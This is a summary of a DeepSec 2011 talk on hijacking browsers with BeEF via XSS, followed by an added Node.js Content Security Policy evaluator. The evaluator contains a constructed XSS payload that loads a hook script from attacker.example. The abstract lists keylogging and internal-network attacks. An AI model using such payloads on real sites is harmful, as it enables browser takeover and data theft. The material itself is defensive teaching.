Michele Orru gave a presentation on web browser security at the DeepSec 2011 security conference:
Browser security is still one of the trickiest challenges to address nowadays. A lot of effort has been spent on mitigating browser exploitation via heap and stack overflows, pointer dereferences and other memory corruption bugs. On the other hand there is still an almost unexplored landscape.
X-Frame-Options, X-XSS-Protection, Content Security Policy, DOM sandboxing are good starting points to mitigate the XSS plague, but they are still not widely implemented.
We will see how a framework like BeEF can be used to abuse the security context of a browser. As we are able to manipulate the DOM for fun and profit in 95% of web applications, a trivial reflected or DOM-based XSS is enough to hook a victim browser to BeEF and control it completely.
The presentation will cover the following main areas, among many others:
Cutting: stealth activities, target enumeration and analysis, comman
Devouring: internal network fingerprinting via JS, exploiting internal services through the browser, keylogging, browser pwnage, autopwn.
Digesting: persistence, tunneling sqlmap/Burp through BeEF proxy, XSS Rays
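The abstract says a single reflected XSS is enough to hook a browser, and names Content Security Policy as one of the not-yet-widespread mitigations. The following is an added example, not code from the abstract or from the BeEF project: a small Node.js evaluator for the script-src part of a CSP header that shows which policies would let an injected external hook script load and which would not. The payload, the host names (attacker.example, victim.example, cdn.victim.example) and the policy strings are constructed for illustration; the matcher handles host, scheme and wildcard-subdomain sources plus 'self', 'none' and '*', and deliberately ignores nonces, hashes and path matching.

```javascript
// Added example (not from the DeepSec abstract or the BeEF project):
// a minimal Content-Security-Policy script-src evaluator used to show why an
// XSS that injects an external hook script is stopped by a strict policy and
// not by a missing or permissive one. Subset of CSP: no nonces/hashes/paths.

// Constructed sample: a reflected payload that loads a hook script from an
// attacker-controlled host (hypothetical hostname).
const INJECTED_PAYLOAD = '<script src="http://attacker.example/hook.js"></script>';

// Pull the src URL out of an injected <script> tag.
function extractScriptSrc(html) {
  const m = /<script[^>]*\bsrc\s*=\s*["']([^"']+)["']/i.exec(html);
  return m ? m[1] : null;
}

// Parse a CSP header value into { directive: [source, ...] }.
function parseCsp(header) {
  const policy = {};
  for (const part of header.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    policy[tokens[0].toLowerCase()] = tokens.slice(1);
  }
  return policy;
}

// Does one CSP source expression permit loading scriptUrl on a page at pageOrigin?
function sourceMatches(source, scriptUrl, pageOrigin) {
  const src = source.toLowerCase();
  const url = new URL(scriptUrl);
  if (src === "'none'") return false;
  if (src === "'self'") return url.origin === pageOrigin.toLowerCase();
  if (src === '*') return true;
  if (src.startsWith("'")) return false; // 'unsafe-inline', nonces, hashes: not host sources
  // Scheme-only source such as "https:" matches any host on that scheme.
  if (src.endsWith(':') && !src.includes('/')) return url.protocol === src;
  // Host source, optionally with an explicit scheme and a *. wildcard label.
  const hostSrc = src.includes('://') ? src : `${url.protocol}//${src}`;
  const [schemePart, hostPart] = hostSrc.split('://');
  if (`${schemePart}:` !== url.protocol) return false;
  const hostOnly = hostPart.split('/')[0];
  if (hostOnly.startsWith('*.')) {
    const suffix = hostOnly.slice(1);               // ".victim.example"
    return url.host.endsWith(suffix) && url.host !== hostOnly.slice(2);
  }
  return url.host === hostOnly;
}

// Would the browser fetch an external script under this policy?
// script-src governs; default-src is the fallback; no policy means no restriction.
function scriptAllowed(cspHeader, scriptUrl, pageOrigin) {
  if (!cspHeader) return true;                      // no CSP at all: the hook loads
  const policy = parseCsp(cspHeader);
  const sources = policy['script-src'] || policy['default-src'];
  if (!sources) return true;                        // neither directive set
  return sources.some((s) => sourceMatches(s, scriptUrl, pageOrigin));
}

// Evaluate one injected payload against several candidate policies.
function evaluatePayload(payload, pageOrigin, policies) {
  const hookUrl = extractScriptSrc(payload);
  const result = {};
  for (const [label, header] of Object.entries(policies)) {
    result[label] = scriptAllowed(header, hookUrl, pageOrigin);
  }
  return result;
}

const PAGE_ORIGIN = 'https://victim.example';       // hypothetical vulnerable app
const POLICIES = {
  none: '',                                          // header absent
  permissive: "default-src *; script-src * 'unsafe-inline'",
  strict: "default-src 'none'; script-src 'self'",
  selfAndCdn: "script-src 'self' https://cdn.victim.example",
};

if (typeof require !== 'undefined' && require.main === module) {
  // Expected: none and permissive allow the hook, strict and selfAndCdn block it.
  console.log(evaluatePayload(INJECTED_PAYLOAD, PAGE_ORIGIN, POLICIES));
}
```

The point a practitioner should take from the output is that only the policies which enumerate trusted script origins stop the hook; a `*` source or a missing header leaves the reflected XSS fully usable, which is why the abstract calls these headers a starting point rather than a fix.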